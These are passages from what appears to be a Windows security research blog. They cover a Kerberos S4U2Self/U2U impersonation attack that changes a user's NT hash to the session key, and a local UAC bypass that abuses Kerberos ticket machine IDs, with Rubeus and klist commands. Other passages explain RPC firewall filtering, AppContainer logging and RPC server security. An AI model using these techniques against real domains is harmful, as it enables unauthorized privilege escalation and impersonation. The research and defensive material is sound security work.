    Technically speaking there should be no reason the KDC couldn't use the user's long term key if you requested a ticket for their UPN, but it doesn't (contrary to an argument I had on /r/netsec the other day with someone who was adamant that SPNs are a convenience, not a fundamental requirement of Kerberos).

    So what to do? There is a way of getting a ticket encrypted for a UPN by using the User-to-User (U2U) extension. Would this work here? Looking at the Rubeus code it seems requesting a U2U S4U2Self ticket is supported, but the parameters are not set up for the S4U attack. Let's set those parameters to request a U2U ticket and see if it works.

    [+] S4U2self success!
    [*] Got a TGS for 'Administrator' to 'charlie@domain.local'
    [*] base64(ticket.kirbi): doIF...bGll

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [X] KRB-ERROR (13) : KDC_ERR_BADOPTION

    Okay, we're getting closer. The S4U2Self request was successful; unfortunately the S4U2Proxy request was not, failing with a KDC_ERR_BADOPTION error. After a bit of playing around, this is almost certainly because the KDC can't decrypt the ticket sent in the S4U2Proxy request. It'll try the user's long term key, but that will obviously fail. I tried to see if I could send the user's TGT with the request (in addition to the S4U2Self service ticket) but it still failed. Is this not going to be possible?

    Thinking about this a bit more, I wondered: could I decrypt the S4U2Self ticket and then re-encrypt it with the long term key I already know for the user? Technically speaking this would create a valid Kerberos ticket; however, it wouldn't create a valid PAC. This is because the PAC contains a Server Signature which is an HMAC of the PAC using the key used to encrypt the ticket. The KDC checks this to ensure the PAC hasn't been modified or put into a new ticket, and if it's incorrect it'll fail the request.

    As we know the key, we could just update this value. However, the Server Signature is protected by the KDC Signature, which is an HMAC keyed with the KDC's own key. We don't know this key and so we can't update this second signature to match the modified Server Signature. Looks like we're stuck.

    Still, what would happen if the user's long term key happened to match the TGT session key we used to encrypt the S4U2Self ticket? It's pretty unlikely to happen by chance, but with knowledge of the user's password we could conceivably change the user's password on the DC between the S4U2Self and the S4U2Proxy requests, so that when we submit the ticket the KDC can decrypt it and perhaps we can successfully get the delegated ticket.

    As we know the TGT's session key, one obvious approach would be to "crack" the hash value back to a valid Unicode password. For AES keys I think this is going to be difficult, and even if successful could be time consuming. However, RC4 keys are just an MD4 hash with no additional protection against brute force cracking. Fortunately the code in Rubeus defaults to requesting an RC4 session key for the TGT, and MS have yet to disable RC4 by default in Windows domains. This seems like it might be doable, even if it takes a long time. We would also need the "cracked" password to be valid per the domain's password policy, which adds extra complications.

    However, I recalled when playing with the SAM RPC APIs that there is a SamrChangePasswordUser method which will change a user's password to an arbitrary NT hash. The only requirement is knowledge of the existing NT hash, and we can set any new NT hash we like. This doesn't need to honor the password policy, except for the minimum age setting. We don't even need to deal with how to call the RPC API correctly, as the SAM DLL exports the SamiChangePasswordUser API which does all the hard work.

    I took some example C# code written by Vincent Le Toux and plugged that into Rubeus at the correct point, passing the current TGT's session key as the new NT hash. Let's see if it works:

    SamConnect OK
    SamrOpenDomain OK
    rid is 1208
    SamOpenUser OK
    SamiChangePasswordUser OK

    [*] Impersonating user 'Administrator' to target SPN 'cifs/WIN10TEST.domain.local'
    [*] Building S4U2proxy request for service: 'cifs/WIN10TEST.domain.local'
    [*] Using domain controller: primarydc.domain.local (10.0.0.10)
    [*] Sending S4U2proxy request to domain controller 10.0.0.10:88
    [+] S4U2proxy success!
    [*] base64(ticket.kirbi) for SPN 'cifs/WIN10TEST.domain.local':
          doIG3...

    And it does! Now the caveats:

    • This will obviously only work if RC4 is still enabled on the domain. 
    • You will need the user's password or NT hash. I couldn't think of a way of doing this with only a valid TGT.
    • The user is sacrificial; it might be hard to log in using a password afterwards. If you can't immediately reset the password due to the domain's policy, the user might be completely broken.
    • It's not very silent, but that's not my problem.
    • You're probably better off just doing the Shadow Credentials attack, if PKINIT is enabled.
    As I'm feeling lazy I'm not going to provide the changes to Rubeus. Except for the call to SamiChangePasswordUser all the code is already there to perform the attack; it just needs to be wired up. I'm sure they'd welcome the addition.

    Bypassing UAC in the most Complex Way Possible!

    By: tiraniddo
    20 March 2022 at 09:52

    While it's not something I spend much time on, finding a new way to bypass UAC is always amusing. When reading through some of the features of the Rubeus tool I realised that there was a possible way of abusing Kerberos to bypass UAC, well, on domain joined systems at least. It's unclear if this has been documented before; this post seems to discuss something similar, but it relies on doing the UAC bypass from another system, whereas what I'm going to describe works locally. Even if it has been described as a technique before, I'm not sure it's been documented how it works under the hood.

    The Background!

    Let's start with how the system prevents you bypassing the most pointless security feature ever. By default LSASS will filter any network authentication token to remove admin privileges if the user is a local administrator. However there's an important exception: if the user is a domain user and a local administrator then LSASS will allow the network authentication to use the full administrator token. This is a problem if, say, you're using Kerberos to authenticate locally. Wouldn't this be a trivial UAC bypass? Just authenticate to a local service as a domain user and you'd get the network token which would bypass the filtering?

    Well no, Kerberos has specific additions to block this attack vector. If I was being charitable I'd say this behaviour also ensures some level of safety. If you're not running as the admin token then accessing, say, the SMB loopback interface shouldn't suddenly grant you administrator privileges through which you might accidentally destroy your system.

    Back in January last year I read a post from Steve Syfuhs of Microsoft on how Kerberos prevents this local UAC bypass. The TL;DR is that when a user wants to get a Kerberos ticket for a service, LSASS will send a TGS-REQ request to the KDC. In the request it'll embed some security information which indicates the user is local. This information will be embedded in the generated ticket.

    When that ticket is used to authenticate to the same system, Kerberos can extract the information and see if it matches one it knows about. If so, it'll take that information, realize that the user is not elevated, and filter the token appropriately. Unfortunately, much as I enjoy Steve's posts, this one was especially light on details. I guessed I'd have to track down how it works myself. Let's dump the contents of a Kerberos ticket and see if we can spot what could be the ticket information:

    PS> $c = New-LsaCredentialHandle -Package 'Kerberos' -UseFlag Outbound
    PS> $x = New-LsaClientContext -CredHandle $c -Target HOST/$env:COMPUTERNAME
    PS> $key = Get-KerberosKey -HexKey 'XXX' -KeyType AES256_CTS_HMAC_SHA1_96 -Principal $env:COMPUTERNAME
    PS> $u = Unprotect-LsaAuthToken -Token $x.Token -Key $key
    PS> Format-LsaAuthToken $u

    <KerberosV5 KRB_AP_REQ>
    Options         : None
    <Ticket>
    Ticket Version  : 5
    ...

    <Authorization Data - KERB_AD_RESTRICTION_ENTRY>
    Flags           : LimitedToken
    Integrity Level : Medium
    Machine ID      : 6640665F...

    <Authorization Data - KERB_LOCAL>
    Security Context: 60CE03337E01000025FC763900000000

    I've highlighted the two entries of interest: the KERB-AD-RESTRICTION-ENTRY and the KERB-LOCAL entry. Of course I didn't guess these names; they are sort of documented in the Microsoft Kerberos Protocol Extensions (MS-KILE) specification. The KERB_AD_RESTRICTION_ENTRY is the most obviously interesting one: it contains both the "LimitedToken" flag and a Medium integrity level.

    When accepting a Kerberos AP-REQ from a network client via SSPI, the Kerberos module in LSASS will call the LSA function LsaISetSupplementalTokenInfo to apply the information from the KERB-AD-RESTRICTION-ENTRY to the token if needed. The pertinent code is roughly the following:

    NTSTATUS LsaISetSupplementalTokenInfo(PHANDLE phToken, 
                            PLSAP_TOKEN_INFO_INTEGRITY pTokenInfo) {
      // ...
      BOOL bLoopback = FALSE;
      BOOL bFilterToken = FALSE;

      if (!memcmp(&LsapGlobalMachineID, pTokenInfo->MachineID,
           sizeof(LsapGlobalMachineID))) {
        bLoopback = TRUE;
      }

      if (LsapGlobalFilterNetworkAuthenticationTokens) {
        if (pTokenInfo->Flags & LimitedToken) {
          bFilterToken = TRUE;
        }
      }

      PSID user = GetUserSid(*phToken);
      if (!RtlEqualPrefixSid(LsapAccountDomainMemberSid, user)
        || LsapGlobalLocalAccountTokenFilterPolicy 
        || NegProductType == NtProductLanManNt) {
        if ( !bFilterToken && !bLoopback )
          return STATUS_SUCCESS;
      }

      /// Filter token if needed and drop integrity level.
    }

    I've highlighted the three main checks in this function. The first compares whether the MachineID field of the KERB-AD-RESTRICTION-ENTRY matches the one stored in LSASS; if it does, the bLoopback flag is set. Then it checks an AFAIK undocumented LSA flag to filter all network tokens, at which point it'll check for the LimitedToken flag and set the bFilterToken flag accordingly. This filtering mode defaults to off, so in general bFilterToken won't be set.

    Finally the code queries for the current created token SID and checks if any of the following is true:
    • The user SID is not a member of the local account domain.
    • The LocalAccountTokenFilterPolicy LSA policy is non-zero, which disables the local account filtering.
    • The product type is NtProductLanManNt, which actually corresponds to a domain controller.
    If any are true then, as long as the loopback flag isn't set and filtering isn't forced, the function will return success and no filtering will take place. Therefore in a default installation, whether a domain user's token is filtered comes down to whether the machine ID matches or not.
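
    As an aside, the LocalAccountTokenFilterPolicy setting in the list above corresponds to the well-known registry value of the same name. You can see whether it's set with a quick query; it's normally absent, meaning local account filtering stays enabled:

    PS> Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue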

    For the integrity level, if filtering is taking place then it will be dropped to the value in the KERB-AD-RESTRICTION-ENTRY authentication data. However it won't increase the integrity level above what the created token has by default, so this can't be abused to get System integrity.

    Note Kerberos will call LsaISetSupplementalTokenInfo with the KERB-AD-RESTRICTION-ENTRY authentication data from the ticket in the AP-REQ first. If that doesn't exist then it'll try calling it with the entry from the authenticator. If neither the ticket nor the authenticator has an entry then it will never be called. How can we remove these values?

    Well, about that!

    Okay, how can we abuse this to bypass UAC? Assuming you're authenticated as a domain user, the funniest way to abuse it is to get the machine ID check to fail. How would we do that? The LsapGlobalMachineID value is a random value generated when LSASS starts up. We can abuse the fact that if you query the user's local Kerberos ticket cache it will return the session key for service tickets, even if you're not an administrator (it won't return TGT session keys by default).

    Therefore one approach is to generate a service ticket for the local system, save the resulting KRB-CRED to disk, reboot the system to get LSASS to reinitialize, and then, once back on the system, reload the ticket. The ticket's machine ID will now no longer match LSASS's, and therefore Kerberos will ignore the restrictions entry. You could do it with the builtin klist and Rubeus with the following commands:

    PS> klist get RPC/$env:COMPUTERNAME
    PS> Rubeus.exe dump /server:$env:COMPUTERNAME /nowrap
    ... Copy the base64 ticket to a file.

    Reboot then:

    PS> Rubeus.exe ptt /ticket:<BASE64 TICKET> 

    You can use Kerberos authentication to access the SCM over named pipes or TCP using the RPC/HOSTNAME SPN. Note the Win32 APIs for the SCM always use Negotiate authentication, which throws a spanner in the works, but there are alternative RPC clients ;-) While LSASS will add a valid restrictions entry to the authenticator in the AP-REQ, it won't be used, as the one in the ticket is used first and that will fail to apply due to the different machine ID.

    The other approach is to generate our own ticket, but won't we need credentials for that? There's a trick, I believe discovered by Benjamin Delpy and put into kekeo, that allows you to abuse unconstrained delegation to get a local TGT with a session key. With this TGT you can generate your own service tickets, so you can do the following:
    1. Query for the user's TGT using the delegation trick.
    2. Make a request to the KDC for a new service ticket for the local machine using the TGT. Add a KERB-AD-RESTRICTION-ENTRY but fill in a bogus machine ID.
    3. Import the service ticket into the cache.
    4. Access the SCM to bypass UAC.
    Ultimately this is a reasonable amount of code for a UAC bypass, at least compared to just changing an environment variable. However, you can probably bodge it together using existing tools such as kekeo and Rubeus, but I'm not going to release a turnkey tool to do this, you're on your own :-)

    Didn't you forget KERB-LOCAL?

    What is the purpose of KERB-LOCAL? It's a way of reusing the local user's credentials. This is similar to NTLM loopback, where LSASS is able to determine that the call is actually from a locally authenticated user and use their interactive token. The value passed in the ticket and authenticator can be checked against a list of known credentials in the Kerberos package, and if there's a match the existing token will be used.

    Would this not always eliminate the need to filter the token based on the KERB-AD-RESTRICTION-ENTRY value? It seems this behavior is used very infrequently due to how it's designed. First, it only works if the accepting server is using the Negotiate package; it doesn't work when using the Kerberos package directly (sort of...). That's usually not an impediment, as most local services use Negotiate anyway for convenience.

    The real problem is that, as a rule, if you use Negotiate to the local machine as a client it'll select NTLM as the default. This will use the loopback already built into NTLM rather than Kerberos, so this feature won't be used. Note that even if NTLM is disabled globally on the domain network it will still work for local loopback authentication. I guess KERB-LOCAL was added for feature parity with NTLM.

    Going back to the formatted ticket at the start of the blog, what does the KERB-LOCAL value mean? It can be unpacked into two 64-bit values, 0x17E3303CE60 and 0x3976FC25. The first value is the heap address of the KERB_CREDENTIAL structure in LSASS's heap!! The second value is the ticket count when the KERB-LOCAL structure was created.
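
    You can verify the unpacking yourself from the Security Context hex string in the dump above. This is just standard .NET byte shuffling; BitConverter reads little-endian on Windows, matching the in-memory layout:

    PS> $hex = '60CE03337E01000025FC763900000000'
    PS> $bytes = [byte[]](0..15 | ForEach-Object { [Convert]::ToByte($hex.Substring($_ * 2, 2), 16) })
    PS> '0x{0:X}' -f [BitConverter]::ToUInt64($bytes, 0)
    0x17E3303CE60
    PS> '0x{0:X}' -f [BitConverter]::ToUInt64($bytes, 8)
    0x3976FC25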

    Fortunately LSASS doesn't just dereference the credentials pointer; it must be in the list of valid credential structures. But the fact that this value isn't blinded, or isn't a reference to a randomly generated value instead, seems a mistake, as heap addresses would be fairly easy to brute force. Of course it's not quite so simple: Kerberos does verify that the SID in the ticket's PAC matches the SID in the credentials, so you can't just spoof the SYSTEM session, but, well, I'll leave that as a thought to be going on with.

    Hopefully this gives some more insight into how this feature works and some fun you can have trying to bypass UAC in a new way.

    UPDATE: This simple C++ file can be used to modify the Win32 SCM APIs to use Kerberos for local authentication.

    LowBox Token Permissive Learning Mode

    By: tiraniddo
    7 September 2021 at 06:53

    I was recently asked about this topic and so I thought it'd make sense to put it into a public blog post so that everyone can benefit. Windows 11 (and Windows Server 2022) has a new feature for tokens which allows the kernel to perform the normal LowBox access check, but if it fails, log the error rather than fail with access denied. 

    This feature allows you to start an AppContainer sandbox process, run a task and determine which parts of it would have failed had the sandbox actually been enforced. This makes it much easier to determine what capabilities you might need to grant to prevent your application from crashing if you tried to actually apply the sandbox. It's a very useful diagnostic tool, although whether it'll be documented by Microsoft remains to be seen. Let's go through a quick example of how to use it.

    First you need to start an ETW trace for the Microsoft-Windows-Kernel-General provider with the KERNEL_GENERAL_SECURITY_ACCESSCHECK keyword (value 0x20) enabled. In an administrator PowerShell console you can run the following:

    PS> $name = 'AccessTrace'
    PS> New-NetEventSession -Name $name -LocalFilePath "$env:USERPROFILE\access_trace.etl" | Out-Null
    PS> Add-NetEventProvider -SessionName $name -Name "Microsoft-Windows-Kernel-General" -MatchAllKeyword 0x20 | Out-Null
    PS> Start-NetEventSession -Name $name

    This will start the trace session and log the events to the access_trace.etl file in your home directory. As this is ETW you could probably do a real-time trace or enable stack tracing to find out what code is actually failing, however for this example we'll do the least amount of work possible. This log is also used for things like Adminless which I've blogged about before.

    Now you need to generate some log events. You just need to add the permissiveLearningMode capability when creating the lowbox token or process. You can almost certainly add it to your application's manifest as well when developing a sandboxed UWP application, but we'll assume here that we're setting up the sandbox manually.

    PS> $cap = Get-NtSid -CapabilityName 'permissiveLearningMode'
    PS> $token = Get-NtToken -LowBox -PackageSid ABC -CapabilitySid $cap
    PS> Invoke-NtToken $token { "Hello" | Set-Content "$env:USERPROFILE\test.txt" }

    The previous code creates a lowbox token with the capability and writes to a file in the user's profile. This would normally fail as the user's profile doesn't grant any AppContainer access to write to it. However, you should find the write succeeded. Now, back in the admin PowerShell console you'll want to stop the trace and cleanup the session.

    PS> Stop-NetEventSession -Name $name
    PS> Remove-NetEventSession -Name $name

    You should find an access_trace.etl file in your user's profile directory which will contain the logged events. There are various ways to read this file, the simplest is to use the Get-WinEvent command. As you need to do a bit of parsing of the contents of the log to get out various values I've put together a simple script to do that. It's available on github here. Just run the script passing the name of the log file to convert the events into PowerShell objects.

    PS> parse_access_check_log.ps1 "$env:USERPROFILE\access_trace.etl"
    ProcessName        : ...\v1.0\powershell.exe
    Mask               : MaximumAllowed
    PackageSid         : S-1-15-2-1445519891-4232675966-...
    Groups             : INSIDERDEV\user
    Capabilities       : NAMED CAPABILITIES\Permissive Learning Mode
    SecurityDescriptor : O:BAG:BAD:(A;OICI;KA;;;S-1-5-21-623841239-...

    The log events don't seem to contain the name of the resource being opened, but they do contain the security descriptor and type of the object, the access mask that was requested and basic information about the access token used. Hopefully this information is useful to someone.

    How the Windows Firewall RPC Filter Works

    By: tiraniddo
    22 August 2021 at 05:32

    I did promise that I'd put out a blog post on how the Windows RPC filter works. Now that I released my more general blog post on the Windows firewall I thought I'd come back to a shorter post about the RPC filter itself. If you don't know the context, the Windows firewall has the ability to restrict access to RPC interfaces. This is interesting due to the renewed interest in all things RPC, especially the PetitPotam trick. For example you can block any access to the EFSRPC interfaces using the following script which you run with the netsh command.

    rpc
    filter
    add rule layer=um actiontype=block
    add condition field=if_uuid matchtype=equal data=c681d488-d850-11d0-8c52-00c04fd90f7e
    add filter
    add rule layer=um actiontype=block
    add condition field=if_uuid matchtype=equal data=df1941c5-fe89-4e79-bf10-463657acf44d
    add filter
    quit

    This script adds two rules which will block any calls on the RPC interfaces with UUIDs of c681d488-d850-11d0-8c52-00c04fd90f7e and df1941c5-fe89-4e79-bf10-463657acf44d. These correspond to the two EFSRPC interfaces.

    How does this work within the context of the firewall? Do the kernel components of the Windows Filtering Platform have a builtin RPC protocol parser to block the connection? That'd be far too complex, instead everything is done in user-mode by some special layers. If you use NtObjectManager's firewall Get-FwLayer command you can check for layers registered to run in user-mode by filtering on the IsUser property.

    PS> Get-FwLayer | Where-Object IsUser
    KeyName                      Name
    -------                      ----
    FWPM_LAYER_RPC_PROXY_CONN    RPC Proxy Connect Layer
    FWPM_LAYER_IPSEC_KM_DEMUX_V4 IPsec KM Demux v4 Layer
    FWPM_LAYER_RPC_EP_ADD        RPC EP ADD Layer
    FWPM_LAYER_KM_AUTHORIZATION  Keying Module Authorization Layer
    FWPM_LAYER_IKEEXT_V4         IKE v4 Layer
    FWPM_LAYER_IPSEC_V6          IPsec v6 Layer
    FWPM_LAYER_IPSEC_V4          IPsec v4 Layer
    FWPM_LAYER_IKEEXT_V6         IKE v6 Layer
    FWPM_LAYER_RPC_UM            RPC UM Layer
    FWPM_LAYER_RPC_PROXY_IF      RPC Proxy Interface Layer
    FWPM_LAYER_RPC_EPMAP         RPC EPMAP Layer
    FWPM_LAYER_IPSEC_KM_DEMUX_V6 IPsec KM Demux v6 Layer

    In the output we can see 5 layers with RPC in the name of the layer. 
    • FWPM_LAYER_RPC_EP_ADD - Filter new endpoints created by a process.
    • FWPM_LAYER_RPC_EPMAP - Filter access to endpoint mapper information.
    • FWPM_LAYER_RPC_PROXY_CONN - Filter connections to the RPC proxy.
    • FWPM_LAYER_RPC_PROXY_IF - Filter interface calls through an RPC proxy.
    • FWPM_LAYER_RPC_UM - Filter interface calls to an RPC server.
    Each of these layers is potentially interesting, and you can add rules through netsh for all of them. But we'll just focus on how the FWPM_LAYER_RPC_UM layer works as that's the one the script introduced at the start works with. If you run the following command after adding the RPC filter rules you can view the newly created rules:

    PS> Get-FwFilter -LayerKey FWPM_LAYER_RPC_UM -Sorted | Format-FwFilter
    Name       : RPCFilter
    Action Type: Block
    Key        : d4354417-02fa-11ec-95da-00155d010a06
    Id         : 78253
    Description: RPC Filter
    Layer      : FWPM_LAYER_RPC_UM
    Sub Layer  : FWPM_SUBLAYER_UNIVERSAL
    Flags      : Persistent
    Weight     : 567453553048682496
    Conditions :
    FieldKeyName               MatchType Value
    ------------               --------- -----
    FWPM_CONDITION_RPC_IF_UUID Equal     df1941c5-fe89-4e79-bf10-463657acf44d


    Name       : RPCFilter
    Action Type: Block
    Key        : d4354416-02fa-11ec-95da-00155d010a06
    Id         : 78252
    Description: RPC Filter
    Layer      : FWPM_LAYER_RPC_UM
    Sub Layer  : FWPM_SUBLAYER_UNIVERSAL
    Flags      : Persistent
    Weight     : 567453553048682496
    Conditions :
    FieldKeyName               MatchType Value
    ------------               --------- -----
    FWPM_CONDITION_RPC_IF_UUID Equal     c681d488-d850-11d0-8c52-00c04fd90f7e

    If you've read my general blog post the output should make some sense. The FWPM_CONDITION_RPC_IF_UUID condition key is used to specify the UUID for the interface to match on. The FWPM_LAYER_RPC_UM layer has many possible fields to filter on, which you can query by inspecting the layer object's Fields property.

    PS> (Get-FwLayer -Key FWPM_LAYER_RPC_UM).Fields

    KeyName                              Type      DataType
    -------                              ----      --------
    FWPM_CONDITION_REMOTE_USER_TOKEN     RawData   TokenInformation
    FWPM_CONDITION_RPC_IF_UUID           RawData   ByteArray16
    FWPM_CONDITION_RPC_IF_VERSION        RawData   UInt16
    FWPM_CONDITION_RPC_IF_FLAG           RawData   UInt32
    FWPM_CONDITION_DCOM_APP_ID           RawData   ByteArray16
    FWPM_CONDITION_IMAGE_NAME            RawData   ByteBlob
    FWPM_CONDITION_RPC_PROTOCOL          RawData   UInt8
    FWPM_CONDITION_RPC_AUTH_TYPE         RawData   UInt8
    FWPM_CONDITION_RPC_AUTH_LEVEL        RawData   UInt8
    FWPM_CONDITION_SEC_ENCRYPT_ALGORITHM RawData   UInt32
    FWPM_CONDITION_SEC_KEY_SIZE          RawData   UInt32
    FWPM_CONDITION_IP_LOCAL_ADDRESS_V4   IPAddress UInt32
    FWPM_CONDITION_IP_LOCAL_ADDRESS_V6   IPAddress ByteArray16
    FWPM_CONDITION_IP_LOCAL_PORT         RawData   UInt16
    FWPM_CONDITION_PIPE                  RawData   ByteBlob
    FWPM_CONDITION_IP_REMOTE_ADDRESS_V4  IPAddress UInt32
    FWPM_CONDITION_IP_REMOTE_ADDRESS_V6  IPAddress ByteArray16

    There's quite a few potential configuration options for the filter. You can filter based on the remote user token that's authenticated to the interface. Or you can filter based on the authentication level and type. This could allow you to protect an RPC interface so that all callers have to use Kerberos at the RPC_C_AUTHN_LEVEL_PKT_PRIVACY level. 
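
    As an aside, you don't need netsh to add rules in this layer. Below is a rough C++ sketch of adding a similar filter programmatically with the FwpmFilterAdd0 API (this needs to run as an administrator; the filter name is made up and the exact condition layout is worth double checking against fwpmu.h):

    #include <initguid.h>
    #include <windows.h>
    #include <fwpmu.h>

    #pragma comment(lib, "fwpuclnt.lib")

    int main() {
      // Open a session to the filter engine.
      HANDLE engine = nullptr;
      if (FwpmEngineOpen0(nullptr, RPC_C_AUTHN_WINNT, nullptr,
                          nullptr, &engine) != ERROR_SUCCESS) {
        return 1;
      }

      // Block any call below packet privacy. In practice you'd add a
      // second FWPM_CONDITION_RPC_IF_UUID condition to scope the rule
      // to a specific interface.
      FWPM_FILTER_CONDITION0 cond = {};
      cond.fieldKey = FWPM_CONDITION_RPC_AUTH_LEVEL;
      cond.matchType = FWP_MATCH_LESS;
      cond.conditionValue.type = FWP_UINT8;
      cond.conditionValue.uint8 = RPC_C_AUTHN_LEVEL_PKT_PRIVACY;

      FWPM_FILTER0 filter = {};
      filter.displayData.name = const_cast<wchar_t*>(L"RequirePktPrivacy");
      filter.layerKey = FWPM_LAYER_RPC_UM;
      filter.subLayerKey = FWPM_SUBLAYER_UNIVERSAL;
      filter.action.type = FWP_ACTION_BLOCK;
      filter.numFilterConditions = 1;
      filter.filterCondition = &cond;

      UINT64 filter_id = 0;
      DWORD err = FwpmFilterAdd0(engine, &filter, nullptr, &filter_id);
      FwpmEngineClose0(engine);
      return err == ERROR_SUCCESS ? 0 : 1;
    }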

    Anyway, configuring it is less important to us, you probably want to know how it works, as the first step to trying to find a way to bypass it is to know where this filter layer is processed (note, I've not found a bypass, but you never know). 

    Perhaps unsurprisingly due to the complexity of the RPC protocol the filtering is implemented within the RPC server process through the RpcRtRemote extension DLL. Except for RPCSS this DLL isn't loaded by default. Instead it's only loaded if there exists a value for the WNF_RPCF_FWMAN_RUNNING WNF state. The following shows the state after adding the two RPC filter rules with netsh.

    PS> $wnf = Get-NtWnf -Name 'WNF_RPCF_FWMAN_RUNNING'
    PS> $wnf.QueryStateData()

    Data ChangeStamp
    ---- -----------
    {}             2

    The RPC runtime sets up a subscription to load the DLL if the WNF value is ever changed. Once loaded the RPC runtime will register all current interfaces to check the firewall. The filter rules are checked when a call is made to the interface during the normal processing of the security callback. The runtime will invoke the FwFilter function inside RpcRtRemote, passing all the details about the firewall interface call. The filter call is only made for DCE/RPC protocols, so not ALPC. It also will only be called if the caller is remote. This is always the case if the call comes via TCP, but for named pipes it will only be called if the pipe was opened via SMB.

    Here's where we can finally determine how the RPC filter is processed. The FwFilter function builds a list of firewall values corresponding to the list of fields for the FWPM_LAYER_RPC_UM layer and passes them to the FwpsClassifyUser0 API along with the numeric ID of the layer. This API will enumerate all filters for the layer and apply the condition checks returning the classification, e.g. block or permit. Based on this classification the RPC runtime can permit or refuse the call. 

    In order for a filter to be accessible for classification the RPC server must have FWPM_ACTRL_OPEN access to the engine and FWPM_ACTRL_CLASSIFY access to the filter. By default the Everyone group has these access rights, however AppContainers and potentially other sandboxes do not. However, in general AppContainer processes don't tend to create privileged RPC servers, at least any which a remote attacker would find useful. You can check the access on various firewall objects using the Get-AccessibleFwObject command.

    PS> $token = Get-NtToken -Filtered -Flags LuaToken
    PS> Get-AccessibleFwObject -Token $token | Where-Object Name -eq RPCFilter

    TokenId Access             Name
    ------- ------             ----
    4ECF80  Classify|Open RPCFilter
    4ECF80  Classify|Open RPCFilter

    I hope this gives enough information for someone to dig into it further to see if there's any obvious bypass I missed. I'm sure there's probably some fun trick you could do to circumvent restrictions if you look hard enough :-)

    How to secure a Windows RPC Server, and how not to.

    By: tiraniddo
    15 August 2021 at 02:04

    The PetitPotam technique is still fresh in people's minds. While it's not directly an exploit it's a useful step to get unauthenticated NTLM from a privileged account to forward to something like the AD CS Web Enrollment service to compromise a Windows domain. Interestingly after Microsoft initially shrugged about fixing any of this they went and released a fix, although it seems to be insufficient at the time of writing.

    While there's plenty of details about how to abuse the EFSRPC interface, there's little on why it's exploitable to begin with. I thought it'd be good to have a quick overview of how Windows RPC interfaces are secured and then by extension why it's possible to use the EFSRPC interface unauthenticated. 

    Caveat: No doubt I might be missing other security checks in RPC, these are the main ones I know about :-)

    RPC Server Security

    The server security of RPC is one which has seemingly built up over time. Therefore there's various ways of doing it, and some ways are better than others. There are basically three approaches, which can be mixed and matched:
    1. Securing the endpoint
    2. Securing the interface
    3. Ad-hoc security
    Let's take each one in turn to determine how each one secures the RPC server.

    Securing the Endpoint

    You register the endpoint that the RPC server will listen on using the RpcServerUseProtseqEp API. This API takes the type of endpoint, such as ncalrpc (ALPC), ncacn_np (named pipe) or ncacn_ip_tcp (TCP socket) and creates the listening endpoint. For example the following would create a named pipe endpoint called DEMO.

    RpcServerUseProtseqEp(
        L"ncacn_np",
        RPC_C_PROTSEQ_MAX_REQS_DEFAULT,
        L"\\pipe\\DEMO",
        nullptr);

    The final parameter is optional but represents a security descriptor (SD) you assign to the endpoint to limit who has access. This can only be enforced on ALPC and named pipes as something like a TCP socket doesn't (technically) have an access check when it's connected to. If you don't specify an SD then a default is assigned. For a named pipe the default DACL grants the following users write access:
    • Everyone
    • NT AUTHORITY\ANONYMOUS LOGON
    • SELF
    Where SELF is the creating user's SID. This is a pretty permissive SD. One interesting thing about RPC endpoints is they are multiplexed. You don't explicitly associate an endpoint with the RPC interface you want to access. Instead you can connect to any endpoint that the process has created. The end result is that if there's a less secure endpoint in the same process it might be possible to access an interface using the least secure one. In general this makes relying on endpoint security risky, especially in processes which run multiple services, such as LSASS. In any case if you want to use a TCP endpoint you can't rely on the endpoint security as it doesn't exist.
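
    That said, if you control the server and only use ALPC or named pipes you can at least replace the permissive default with an explicit SD. A minimal sketch (the SDDL string is just an example which only grants administrators access):

    #include <windows.h>
    #include <sddl.h>
    #include <rpc.h>

    #pragma comment(lib, "rpcrt4.lib")
    #pragma comment(lib, "advapi32.lib")

    int main() {
      // Build a DACL which only grants BUILTIN\Administrators access.
      PSECURITY_DESCRIPTOR sd = nullptr;
      if (!ConvertStringSecurityDescriptorToSecurityDescriptorW(
          L"D:(A;;GA;;;BA)", SDDL_REVISION_1, &sd, nullptr)) {
        return 1;
      }

      // Register the endpoint with the explicit SD rather than
      // accepting the permissive default.
      RPC_STATUS status = RpcServerUseProtseqEpW(
          (RPC_WSTR)L"ncacn_np",
          RPC_C_PROTSEQ_MAX_REQS_DEFAULT,
          (RPC_WSTR)L"\\pipe\\DEMO",
          sd);
      LocalFree(sd);
      return status == RPC_S_OK ? 0 : 1;
    }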

    Securing the Interface

    The next way of securing the RPC server is to secure the interface itself. You register the interface structure that was generated by MIDL using one of the following APIs:
    • RpcServerRegisterIf
    • RpcServerRegisterIfEx
    • RpcServerRegisterIf2
    • RpcServerRegisterIf3
    • RpcServerInterfaceGroupCreate
    Each has a varying number of parameters, some of which determine the security of the interface. The latest APIs are RpcServerRegisterIf3 and RpcServerInterfaceGroupCreate which were introduced in Windows 8. The latter is just a way of registering multiple interfaces in one call so we'll just focus on the former. RpcServerRegisterIf3 has three parameters which affect security, SecurityDescriptor, IfCallback and Flags. 

    The SecurityDescriptor parameter is easiest to explain. It assigns an SD to the interface, when a call is made on that interface then the caller's token is checked against the SD and access is only granted if the check passes. If no SD is specified a default is used which grants the following SIDs access (assuming a non-AppContainer process):
    • NT AUTHORITY\ANONYMOUS LOGON
    • Everyone
    • NT AUTHORITY\RESTRICTED
    • BUILTIN\Administrators
    • SELF
    The token to use for the access check is based either on the client's authentication (we'll discuss this later) or the authentication for the endpoint. ALPC and named pipes are authenticated transports, whereas TCP is not. When using an unauthenticated transport the access check will be against the anonymous token. This means if the SD does not contain an allow ACE for ANONYMOUS LOGON it will be blocked.

    Note, due to a quirk of the access check process the RPC runtime grants access if the caller has any access granted, not a specific access right. What this means is that if the caller is considered the owner, which is normally set to the creating user SID they might only be granted READ_CONTROL but that's sufficient to bypass the check. This could also be useful if the caller has SeTakeOwnershipPrivilege or similar as it'd be possible to generically bypass the interface SD check (though of course that privilege is dangerous in its own right).

